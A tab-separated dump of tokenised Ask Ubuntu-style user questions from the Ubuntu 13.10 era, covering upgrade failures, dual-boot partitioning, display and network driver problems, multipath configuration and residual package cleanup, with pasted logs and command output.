: speakers [ 0xffff ] fl/fr lfe fc rl/rr rc flc/frc rlc/rrc flw/frw flh/frh sad_count 1 sad0_coding_type [ 0x1 ] lpcm sad0_channels 2 any ideas on what 's wrong ? several things broke when i did the upgrade -- so far it 's been the configuration files . does someone know what the /etc/asound.conf file should look like ? thanks much , jim
365885	upgrade from 13.04 to 13.10 fails	tried to upgrade my computer from 13.04 to 13.10 , but directly after pressing the upgrade , a couple files appear to download , and then the window disappears and nothing happens ... i tried it from the terminal window and this is the output ( same result ) jessijo @ halesite3 : ~ $ update-manager checking for a new ubuntu release authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg ' extracting 'saucy.tar.gz' real-time signal 0 any ideas ?
365889	partition not recognized ?	i was trying to install win7 on my ubuntu laptop so i can run the two operating systems together . however , despite my 248 gb partition in the hard drive ready for use , i get an error saying that `` i need a partition greater than 829 mb '' . here 's a screenshot that hopefully shows what 's going on . any advice ?
365890	forwarding the results of text processing commands to certain locations in an .ods file	i am looking for an efficient way to import the data from a bunch of text files into an .ods file . i have no problem in processing the text files with commands like grep and sed , however , i do not know if it is possible to redirect the results of these commands into a certain location in an ods file .
365892	kubuntu network panel	i did upgrade from kubuntu 13.04 to 13.10. observe the network control panel has been modernized and is nice and easy up to the point of connection and disconnection , the old panel had the option to disconnect , for example , say wireles connection or wired connection , you could simply connect or disconnect them with a click on the x button . sometimes it goes wrong wireles card and prefer to use only wired connection . but sometimes you do not have access to wired so i need wireles . either version , every time i delete and restore settings every time it is uncomfortable . neither terminal way does not seem easy to do this every time . there is somehow an alternative to setting ? somehow return to the old panel ? possibly another modern network maneger ?
365893	why does ubuntu only work when an external monitor is plugged in ?	i have installed ubuntu 12.04 on my fujitsu siemens amilo pro v3315 laptop computer . the installation appears ok , but the only way i can see anything on the screen is if i plug in my old packard bell 15-year-old crt monitor into the vga plug on the back of the laptop . then all works well , and both laptop screen and the crt screen show the same thing . the laptop will even keep working ok if i unplug the external monitor . but , if i turn the laptop off and on , it starts up gets as far as a menu with the heading : gnu grub version 1.99-21ubuntu3.10 , and the first entry , which says : ubuntu , with linux 3.8.0-29-generic , seems to be the one i need to choose . however , when i do that i am left with a blank dark screen and a silent computer , control-alt-delete does nothing for it . if anyone does have any suggestions on how i can get it to work without the need for an external monitor i would be grateful for explanations in simple terms - i know nothing at all about using ubuntu . thanks .
365894	black screen when installing ubuntu ?	i am trying to install ubuntu 13.10 on my pc through a usb flash drive . i get to a screen that asks if i want to try ubuntu without installing it , another option that asks if i want to install it , download some oem thing and if i want to check for errors in the ubuntu files . i try all of them and end up on the ubuntu loading window and then the screen turns black . nothing happens after . i have not found a fix for this at all . here are my pc specs : model : lenovo g505 processor : amd a6-5200 apu with radeon hd graphics 2.00 ghz ram : 4.00gb operating system : windows 8.1 64 bit please help me i really want to install ubuntu because i have never used it and i would like to experiment with it : d : d : d : d and also , i am a noob with technology so please put your answer as simple as possible so i can understand it : d : d : :d
365896	when i update my ubuntu 12.04 always i have to reinstall because the ubuntu is freeze in the violet screen	what could i do with this problem ? i 'm new in ubuntu , then please explain me this easy as possible .
365897	how to install opencv without nvidia drivers	i have a laptop with on-board intel graphics . i have been using opencv for years with this machine and i have managed to avoid manual compilation so far . but in ubuntu 13.10 , when i try to install libopencv-dev from the repositories , it brings along libopencv-ocl , which seems to be dependent on nvidia drivers . letting the driver install messes up my xserver completely and when i do glxinfo afterwards , i get this : name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . to solve this , i purge all nvidia drivers and reinstall xserver , much like it has been suggested here , and when i purge the nvidia drivers , opencv development libraries are also removed , as apt-get tells me they are no longer needed . this is foreign to me , because i expected a warning that i have installed packages that depend on this , but how can removing a dependency automatically remove the package i installed without warnings or asking ? i understand it has something to do with nvidia being the provider of the libopencv-ocl in the repo . how could i get around it ? i would rather not compile opencv if i can help it . i have seen similar questions , but not a suitable answer .
365901	ubuntu 13.10 resetting some settings	i own a vaio sve1512y1e , after every single reboot , or suspend , some settings come back to their original status , those are : -bluetooth . -brigthness -keyboard layout ( even it says its in the right one ) current kernel ( 3.11.0-12-generic ) any idea how to fix it ?
365902	how can i check if a ppa has packages for another ubuntu version ?	i use a lot of ppa 's . i 'd like to check if all of them have packages for saucy before updating . is there a program which checks whether my ppas have packages for a different version of ubuntu ?
365905	open url from chrome in default browser	if i have a page opened in chrome , is it possible to open the urls from that page in the default browser not in chrome ? example : i 'm using chrome for facebook and opera for everything else and i want when i click on a link from facebook to be opened in opera .
365907	configure : error : you need 32-bits luac when using using lua from contrib	i installed ubuntu 13.10 64 bits on virtualbox . i am trying to compile vlc using these steps : https : //wiki.videolan.org/win32compile/ when i reached this step : ../extras/package/win32/configure.sh -- host=i586-mingw32msvc ( i used host=i686-w64-mingw32 as explained in the link ) , i got this error : configure : error : you need 32-bits luac when using using lua from contrib . i am a newbie at this . would someone please explain how to fix this ? i have windows 7 64 bits .
365911	why the services do not start at installation ?	i 've seen this sometime now , but not finding anything in the ubuntu man about this peculiar policy-rc.d binary that prevents services from being started/restarted/stopped when called by dpkg/apt , so i would like to know what is the reason of this . setting up lxc ( 0.9.0-0ubuntu3.6 ) ... invoke-rc.d : policy-rc.d denied execution of start . invoke-rc.d : policy-rc.d denied execution of start . invoke-rc.d : policy-rc.d denied execution of start . apparently , no package owns this binary : dpkg -s /usr/sbin/policy-rc.d dpkg-query : no path found matching pattern /usr/sbin/policy-rc.d
365913	how to use custom background picture in ubuntu 13.10 ?	since i upgraded to ubuntu 13.10 i ca n't find a way to chose a custom picture as desktop background . i tried system settings - > background , but this menu does not provide any file picker or something to choose a picture but shows only the preinstalled pictures : or an empty window : i cant find the options to set how the picture ought to be displayed neither ( like stretch or scale ) is it really true that this simple task is n't possible any more ? do i have to install cinnamon desktop just to be able to change my background picture ? or how to do it with ubuntu ?
365914	dual booting sony vaio with 4 primary partitions already	i have been trying to dual-boot my sony vaio for a few weeks now . i am able to get to get to the installation menu , however , i am not given the option of running ubuntu alongside windows 7 . so , i chose `` something else '' and see this : i seem to have four primary partitions already . does this mean that i would have to delete a partition and then free up space from another ? if so , how would i go about this ? which partition would i be able to delete without messing up my hard drive and losing everything ? regardless , i do n't understand why ubuntu is not recognizing my windows 7 partition . i have done quite a bit of research and have noticed that a lot of people have had a hard time dual-booting with their vaio 's , but i have not seen a solution that pertains to my situation . i have also included an image of my partitions in windows : any help would be much appreciated . thank you !
365915	how do i burn ubuntu server to a cd	how do i burn ubuntu server to a cd
365917	what version of ubuntu should i install in a hp probook 4540s	i want to dual boot ubuntu & windows 7 on my laptop hp probook 4540s ( core i5 ) , what version of ubuntu do you think i should install ? 12.04 or 13.10 ? ... i 'm thinking on possible compatibility issues with the drivers in 13.10 ... any opinions ?
365924	ubuntu 13.04 . just did software update ... not logging in	i just did a software update through software updater and re-booted the machine . now i ca n't log in as myself ... i can only log in as a guest . when i try to log in as myself , i get a terminal-like screen stating starting apache server , and it loops right back to the login screen ... . tried it 10 times . what happened and how can it be fixed ? ? update ... even when logged in as a guest , my user name shows on the system menu ( the 0/1 icon ) at the top right , beside the time display ) . switching users there sends me through the same login loop .
365926	install ubuntu on lenovo n586 which has four partitions	boot from disc : when i get to the partition part , it only gives the option to write over windows , or `` something else '' . my lenovo has four partitions already , and based on a bit of googling , it is not considered prudent to delete one of them . how can i re size my primary partition from 420 gig so that i can install ubuntu on 20 gigs ?
365927	uninstalling ubuntu from my alienware m11x	i installed ubuntu on my alienware m11x using the dual boot software from your site . ubuntu worked for a brief period , but then it just stopped . upon start up in the boot menu , i would have an option to boot to windows 7 or ubuntu . if i click ubuntu now , it brings me to a black screen with some text that just keeps me there . i am unable to do anything until i restart my computer and return to the boot menu , where i can only restart into windows . i would like to delete the ubuntu and the hard drive partition so i no longer have the option to boot into either os and it just boots to windows . how do i do this . i am selling the computer and would like it to go to the new user with no issues . ps , i have no partition ... oi ca n't delete a partition ... very strange . thank you ! best , rh
365933	ubuntu 13.04 doesnt want to start upgrade	ubuntu 13.04 doesnât want to start upgrade , it says that upgrade available ( 13.10 ) , but when i hit upgrade button update window disappears and nothing happening ... any ideas ?
365938	sprint netgear 341u usb modem	i connect my sprint netgear 341u usb modem to my computer but ubuntu 12.04 did not recognize it .
365941	how to speed up boot times ?	i have windows 7 and ubuntu 13.04 set up as dual boot , before , ubuntu boots up under 10 second ( i think maybe 7 or lower ) . now it boots up 30 seconds or more which is pretty annoying . the thing is i do n't know what i did before this happened and i 'm pretty new at ubuntu . i 've googled have n't seen anything that works . here 's the part of dmesg where it slows down . [ 2.696568 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 2.705096 ] usb 2-1.3 : new high-speed usb device number 4 using ehci-pci [ 2.798688 ] usb 2-1.3 : new usb device found , idvendor=0fca , idproduct=8004 [ 2.798698 ] usb 2-1.3 : new usb device strings : mfr=1 , product=5 , serialnumber=3 [ 2.798705 ] usb 2-1.3 : product : rim composite device [ 2.798710 ] usb 2-1.3 : manufacturer : research in motion [ 2.798716 ] usb 2-1.3 : serialnumber : 00793df3233817e4c372480545113986a36d4753 [ 28.457346 ] adding 4102140k swap on /dev/sda6 . priority : -1 extents:1 across:4102140k [ 28.489449 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 28.518070 ] udevd [ 404 ] : starting version 175 [ 28.789652 ] lp : driver loaded but no devices found [ 29.904464 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20121018/utaddress-251 ) [ 29.904472 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 29.904477 ] acpi warning : 0x0000000000000540-0x000000000000054f systemio conflicts with region \sbgp 1 ( 20121018/utaddress-251 ) [ 29.904481 ] acpi warning : 0x0000000000000540-0x000000000000054f systemio conflicts with region \gpio 2 ( 20121018/utaddress-251 ) [ 29.904484 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 29.904486 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \sbgp 1 ( 20121018/utaddress-251 ) [ 29.904488 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 2 ( 20121018/utaddress-251 ) [ 29.904490 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 29.904491 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \sbgp 1 ( 20121018/utaddress-251 ) [ 29.904493 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 2 ( 20121018/utaddress-251 ) [ 29.904496 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 29.904497 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich i was told to use bootchart but i do n't know how to read the results : bootchart image
365944	installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) beggining from zero	regards ! i 'm relatively new at linux and wanted to have a dual booting notebook but i downloaded other distro which with just one click formated mi pc and lost all partitions . now i am interested to install ubuntu , but for me it 's kinda dificult due to loss of uefi data . i 've read this articles : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) install ubuntu on efi machine with windows 8 preinstalled ( possibly remove windows 8 ) ultimately those were not my case , i 've tried by myself but need your help . do n't know what more info have to give ... my notebook it 's one samsung ativ book 9 . only supports pendrives which i prepare with unetbootin ( by the way have only one pendrive , do n't know if i shall to have another -tell this because maybe i 'll need some other tools and i wonder if programs will have conflict- ) . thanks in advance .
365947	am i running out of memory or do i have two logical drives instead of one	i did a complete reinstall of ubuntu 13.04 a couple of months ago . since then , i have switched out my motherboard with another . i kept the same hard drive . i just did an upgrade to 13.10 . recently , after this install , i keep getting the message that i 'm running out of memory . i just checked my system usage and was surprised by what i found . i believed that i installed ubuntu as a fresh install but when i check the system usage , it seems like there are two logical drives . i just did the basic install , so i was only expecting to see one partition but instead i see two . one is a small 300mb partition , the other is a 300gb partition i was expecting . can anyone tell me if i have two partitions and/or logical drives and if so how i can fix this ? i seem to have been running on the smaller drive and now i 'm obviously out of space . i want to be able to use the bigger one at least .
365948	where is the screen saver folder	i want to display my own screen saver . where are the apple screen savers stored . i looked in the hard drive and have n't found the folder
365949	why do i need an extended partition ?	what is an extended partition ? why do i need to use it to install ubuntu if i already have four partitions that are factory installed ?
365951	my computer cant read ubuntu on cdrom	i have a emachines e525 i have put the iso on a blank disk and set the boot up usb cd-rom and it does not see the cd and i tried the iso on virtual box and it will not load it failed to open the optical disk file c : \users\donna\desktop\ubuntu-12.04.3-desktop-i386.iso . could not get the storage format of the medium 'c : \users\donna\desktop\ubuntu-12.04.3-desktop-i386.iso ' ( verr_not_supported ) . result code : vbox_e_iprt_error ( 0x80bb0005 ) component : medium interface : imedium { 05f2bbb6-a3a6-4fb9-9b49-6d0dda7142ac } callee : ivirtualbox { fafa4e17-1ee2-4905-a10e-fe7c18bf5554 } callee rc : vbox_e_object_not_found ( 0x80bb0001 ) can any one help
365954	move /home/ ( user ) folders to other location	ubuntu 13.04 is installed on a ssd . i also have a hdd in the computer . i want the ssd to continue having relatively high speed for as long as possible . my /home/ folders ( including the desktop ) tend to having things written and deleted , which is n't ideal for ssd . i want ubuntu to be installed in the ssd , but i want my /home/ folders to be on the hdd ( but only the folders whose names do n't start with . ) . i did have a try to do this from the terminal , but i could n't work out if modifying fstab ( by changing uuid ) only allocated /home/ to the : ( a ) hdd ; or ( b ) a folder on the hdd ( which is what i wanted ) . i therefore used ubuntu-tweak 0.8.6 . it has been partially successful : nautilus > places > desktop is ok. nautilus > places > home > desktop is different , and it should be the same . nautilus > places > documents is ok. nautilus > places > home > documents is different , and it should be the same . i tried to attach screenshots that i have of these examples but i got an error message ( `` you need a reputation of at least 10 to post images '' ) . any ideas how to complete the process , such that : nautilus > places > home > desktop is the same as nautilus > places > desktop . nautilus > places > home > documents is the same as nautilus > places > documents . ... and so on for all the /home/ folders ?
365955	compiz and unsettings stopped working after installing octave	i had compiz and unsettings working perfectly , now i just installed octave-3.6.4 and qtoctave and both compiz and unsettings stopped working . i reinstalled both ( compiz and unsettings ) but i ca n't get to make them work again . i am able to enter the compiz config settings manager , but non of the changes are reflected . the same with unsettings . thanks !
365956	multipath with emc or netapp freeze when disable one data path	when i run the following command `` multipath -ll '' i get : root @ test-ganders : /opt/netapp/santools # multipath -ll mpath2 ( 3600a098044333175322b44546a466a57 ) dm-4 netapp , lun c-mode size=10g features='1 queue_if_no_path ' hwhandler='0 ' wp=rw |-+- policy='round-robin 0 ' prio=4 status=active | - 9:0:0:2 sdg 8:96 active ready running -+- policy='round-robin 0 ' prio=1 status=enabled `- 8:0:0:2 sdf 8:80 active ready running here is see two things , the first one is why that status is not `` active '' in both paths , and the other is why they got different prio . here 's the /etc/multipath.conf complete file : defaults { queue_without_daemon no user_friendly_names no max_fds max } blacklist { devnode `` ^sd [ a-c ] '' devnode `` ^ ( ram|raw|loop|fd|md|dm-|sr|scd|st ) [ 0-9 ] '' devnode `` ^hd [ a-z ] '' devnode `` ^cciss ! c [ 0-9 ] d [ 0-9 ] '' } devices { device { vendor `` netapp '' product `` lun '' path_grouping_policy multibus getuid_callout `` /lib/udev/scsi_id -g -u -s -- device=/dev/ % n '' path_selector round-robin 0 path_checker directio checker directio features `` fail_if_no_path '' hardware_handler `` 0 '' prio netapp failback immediate rr_min_io 128 } # # device attributes for emc symmetrix device { vendor `` emc `` product `` symmetrix '' path_grouping_policy multibus getuid_callout `` /lib/udev/scsi_id -g -u -s /block/ % n '' path_selector `` round-robin 0 '' features `` 0 '' hardware_handler `` 0 '' failback immediate } } the other issue and very difficult is that when i disable one of the data ports of the netapp , and i run a `` multipath -ll '' again.. it get 's freeze ... until i put back online the data port and then it release the prompt . someone got this kind of problem or know how to solved it ? i 've try so many different parameters , but with any luck at all . so any help will be really appreciated . the filer is a fas3250 with iscsi connectivity . thanks in advance ,
365957	dell inspiron 14z ethernet device not found by the system	i have installed ubuntu 13.10 on my dell inspiron 14z and i simply cant find a way to make my ethernet/wired connection work . i have searched a lot , and i actually found a lot of information and drivers , like compat-wireless ( 2.3 to 3.6 ) and linux-backports ... the fact is , i have tried all of these without luck , so i am wondering if someone can help me with this , seems that the system cant find the hardware for ethernet ... another thing is that the ethernet driver for this pc should be : atheros communications inc. ar8152 v2.0 fast ethernet as per this link http : //www.ubuntu.com/certification/hardware/201106-8252/ but if you see below , the driver that ubuntu is actually using seems to be : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) also , i ask sorry in advance for my lack of experience , i am really new to linux , but i am learning ; ) please see below more technical info : $ ifconfig -a root @ bloodseek : ~ # ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1277 errors:0 dropped:0 overruns:0 frame:0 tx packets:1277 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:148354 ( 148.3 kb ) tx bytes:148354 ( 148.3 kb ) wlan0 link encap : ethernet hwaddr 70:18:8b : fb:96:93 inet addr:10.0.0.102 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :7218:8bff : fefb:9693/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7717 errors:0 dropped:0 overruns:0 frame:0 tx packets:6982 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6839655 ( 6.8 mb ) tx bytes:1043926 ( 1.0 mb ) $ lspci root @ bloodseek : ~ # lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7550m/7570m/7650m ] 07:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) $ ifconfig eth0 up root @ bloodseek : ~ # ifconfig eth0 up eth0 : error while getting interface flags : no such device $ lshw -c network root @ bloodseek : ~ # lshw -c network *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 01 serial : 70:18:8b : fb:96:93 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-12-generic firmware=n/a ip=10.0.0.102 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:19 memory : f7c00000-f7c7ffff memory : f7c80000-f7c8ffff thank you very much in advance ! ! kind regards , frank
365958	error while running software related programs ( expected gobject.object , but got pycobject )	here 's the output of console when i try running the software-center : 2013-10-25 20:50:45,670 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none ' > 2013-10-25 20:50:46,640 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-25 20:50:46,642 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-10-25 20:50:46,648 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-10-25 20:50:46,648 - root - error - could not find any typelib for launchpadintegration 2013-10-25 20:50:46,724 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1375 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1313 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 240 , in init_view vm.display_page ( self , self.pages.lobby , self.state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 183 , in display_page pane.enter_page ( page , view_state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 637 , in enter_page self.display_lobby_page ( state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 652 , in display_lobby_page self._clear_search ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 559 , in _clear_search self.searchentry.clear_with_no_signal ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/searchentry.py '' , line 120 , in clear_with_no_signal self.handler_block ( self._handler_changed ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gobject.py '' , line 454 , in signal_handler_block gobjectmodule.signal_handler_block ( _get_instance_for_signal ( obj ) , handler_id ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 113 , in function return info.invoke ( *args , **kwargs ) typeerror : argument instance : expected gobject.object , but got pycobject i get similar thing when running software-properties-gtk . re installing does not work . i installed some patch for python , did not work . removed/installed various libraries , did not help . i will provide any info necessary to solve the problem as soon as you will ask anything . just to get started , i 'm running 13.04 on flashback gnome . i did install the 32bit library ( ia32-libs ) even though i 'm using a 64bit system . i do have synaptic for now to install some stuff , but i would like to fix the issue regardless . it 's a dell laptop ( studio 1555 ) 4gb ram , intel core 2 duo proc ) . if anyone has some interesting ideas , let me know . thanks !
365959	why was libhal removed in ubuntu 13.10 ?	after installing 13.10 , i realized libhal was no longer a sudo apt-get install away ... in fact it was no longer anywhere to be found ( except in the raring repos ) . and installing libhal from the raring repos is not the best option . it is the best workaround for not having it . why was it removed ? was it an accidental removal , or is it no longer going to be included in the repos , even in the next lts ? i ask because amazon ( and other services ) require it to be installed .
365961	problems with sound/shutdown screen on ubuntu 13.10	i 'm running saucy on my dell latitude d620 laptop and often when i press the 'mute ' button the shutdown screen appears . it does n't do it every time but often enough to be irritating . as i 've been struggling with brightness problems ( every time i power up i have to adjust the brightness ) , this is another little bug i can do without . has anyone else had this problem or found a way round it ? it 's only started happening since i upgraded . thanks .
365963	update manager - insufficient storage space ( false alarm )	i 'm trying to run update manager but it keeps reporting that there 's not enough space . here 's the screenshot : i ran sudo apt-get update & & sudo apt-get upgrade from the terminal but still update manager says that there are updates and i can not seem to get pass this message . i have even removed many programs from my system and there is supposed to be at least 6gb of disk space free . what can i do ?
365965	how to remove all `` rc '' - residual packages using command line at once ?	i have an asus q500a with win8 and ubuntu 12.04 64 bit ; linux kernel 3.8.0-32-generic . i have been having residual package issues which have been giving me trouble trying to reconfigure xserver-xorg-lts-raring . i tried removing all residual packages from synaptic but the following were not removed . i 've been using sudo apt-get purge name to remove packages one at a time , i am down to libieee1284-3 : i386 but it is too time consuming . is there a way i can remove all of them at once , or groups of them ? output of sudo dpkg -l | grep `` ^rc '' rc gstreamer0.10-plugins-good : i386 0.10.31-1ubuntu1.2 gstreamer plugins from the `` good '' set rc libaa1 : i386 1.4p5-39ubuntu1 ascii art library rc libaio1 : i386 0.3.109-2ubuntu1 linux kernel aio access library - shared library rc libao4 : i386 1.1.0-1ubuntu2 cross platform audio output library rc libasn1-8-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - asn.1 library rc libasound2 : i386 1.0.25-1ubuntu10.2 shared library for alsa applications rc libasyncns0 : i386 0.8-4 asynchronous name service query library rc libatk1.0-0 : i386 2.4.0-0ubuntu1 atk accessibility toolkit rc libavahi-client3 : i386 0.6.30-5ubuntu2 avahi client library rc libavahi-common3 : i386 0.6.30-5ubuntu2 avahi common library rc libavc1394-0 : i386 0.5.3-1ubuntu2 control ieee 1394 audio/video devices rc libcaca0 : i386 0.99.beta17-2.1ubuntu2 colour ascii art library rc libcairo-gobject2 : i386 1.10.2-6.1ubuntu3 the cairo 2d vector graphics library ( gobject library ) rc libcairo2 : i386 1.10.2-6.1ubuntu3 the cairo 2d vector graphics library rc libcanberra-gtk0 : i386 0.28-3ubuntu3 gtk+ helper for playing widget event sounds with libcanberra rc libcanberra0 : i386 0.28-3ubuntu3 simple abstract interface for playing event sounds rc libcap2 : i386 1:2.22-1ubuntu3 support for getting/setting posix.1e capabilities rc libcdparanoia0 : i386 3.10.2+debian-10ubuntu1 audio extraction tool for sampling cds ( library ) rc libcroco3 : i386 0.6.5-1ubuntu0.1 cascading style sheet ( css ) parsing and manipulation toolkit rc libcups2 : i386 1.5.3-0ubuntu8 common unix printing system ( tm ) - core library rc libcupsimage2 : i386 1.5.3-0ubuntu8 common unix printing system ( tm ) - raster image library rc libcurl3 : i386 7.22.0-3ubuntu4.3 multi-protocol file transfer library ( openssl ) rc libdatrie1 : i386 0.2.5-3 double-array trie library rc libdbus-glib-1-2 : i386 0.98-1ubuntu1.1 simple interprocess messaging system ( glib-based shared library ) rc libdbusmenu-qt2 : i386 0.9.2-0ubuntu1 qt implementation of the dbusmenu protocol rc libdrm-nouveau2 : i386 2.4.43-0ubuntu0.0.3 userspace interface to nouveau-specific kernel drm services -- runtime rc libdv4 : i386 1.0.0-3ubuntu1 software library for dv format digital video ( runtime lib ) rc libesd0 : i386 0.2.41-10build3 enlightened sound daemon - shared libraries rc libexif12 : i386 0.6.20-2ubuntu0.1 library to parse exif files rc libexpat1 : i386 2.0.1-7.2ubuntu1.1 xml parsing c library - runtime library rc libflac8 : i386 1.2.1-6 free lossless audio codec - runtime c library rc libfontconfig1 : i386 2.8.0-3ubuntu9.1 generic font configuration library - runtime rc libfreetype6 : i386 2.4.8-1ubuntu2.1 freetype 2 font engine , shared library files rc libgail18 : i386 2.24.10-0ubuntu6 gnome accessibility implementation library -- shared libraries rc libgconf-2-4 : i386 3.2.5-0ubuntu2 gnome configuration database system ( shared libraries ) rc libgcrypt11 : i386 1.5.0-3ubuntu0.2 lgpl crypto library - runtime library rc libgd2-xpm : i386 2.0.36~rc1~dfsg-6ubuntu2 gd graphics library version 2 rc libgdbm3 : i386 1.8.3-10 gnu dbm database routines ( runtime version ) rc libgdk-pixbuf2.0-0 : i386 2.26.1-1 gdk pixbuf library rc libgif4 : i386 4.1.6-9ubuntu1 library for gif images ( library ) rc libgl1-mesa-dri-lts-quantal : i386 9.0.3-0ubuntu0.4~precise1 free implementation of the opengl api -- dri modules rc libgl1-mesa-dri-lts-raring : i386 9.1.4-0ubuntu0.1~precise2 free implementation of the opengl api -- dri modules rc libgl1-mesa-glx : i386 8.0.4-0ubuntu0.6 free implementation of the opengl api -- glx runtime rc libgl1-mesa-glx-lts-quantal : i386 9.0.3-0ubuntu0.4~precise1 free implementation of the opengl api -- glx runtime rc libgl1-mesa-glx-lts-raring : i386 9.1.4-0ubuntu0.1~precise2 free implementation of the opengl api -- glx runtime rc libglapi-mesa : i386 8.0.4-0ubuntu0.6 free implementation of the gl api -- shared library rc libglapi-mesa-lts-quantal : i386 9.0.3-0ubuntu0.4~precise1 free implementation of the gl api -- shared library rc libglapi-mesa-lts-raring : i386 9.1.4-0ubuntu0.1~precise2 free implementation of the gl api -- shared library rc libglu1-mesa : i386 8.0.4-0ubuntu0.6 mesa opengl utility library ( glu ) rc libgnome-keyring0 : i386 3.2.2-2 gnome keyring services library rc libgnutls26 : i386 2.12.14-5ubuntu3.5 gnu tls library - runtime library rc libgomp1 : i386 4.6.3-1ubuntu5 gcc openmp ( gomp ) support library rc libgpg-error0 : i386 1.10-2ubuntu1 library for common error values and messages in gnupg components rc libgphoto2-2 : i386 2.4.13-1ubuntu1.2 gphoto2 digital camera library rc libgphoto2-port0 : i386 2.4.13-1ubuntu1.2 gphoto2 digital camera port library rc libgssapi-krb5-2 : i386 1.10+dfsg~beta1-2ubuntu0.3 mit kerberos runtime libraries - krb5 gss-api mechanism rc libgssapi3-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - gssapi support library rc libgstreamer-plugins-base0.10-0 : i386 0.10.36-1ubuntu0.1 gstreamer libraries from the `` base '' set rc libgstreamer0.10-0 : i386 0.10.36-1ubuntu1 core gstreamer libraries and elements rc libgtk2.0-0 : i386 2.24.10-0ubuntu6 gtk+ graphical user interface library rc libgudev-1.0-0 : i386 1:175-0ubuntu9.4 gobject-based wrapper library for libudev 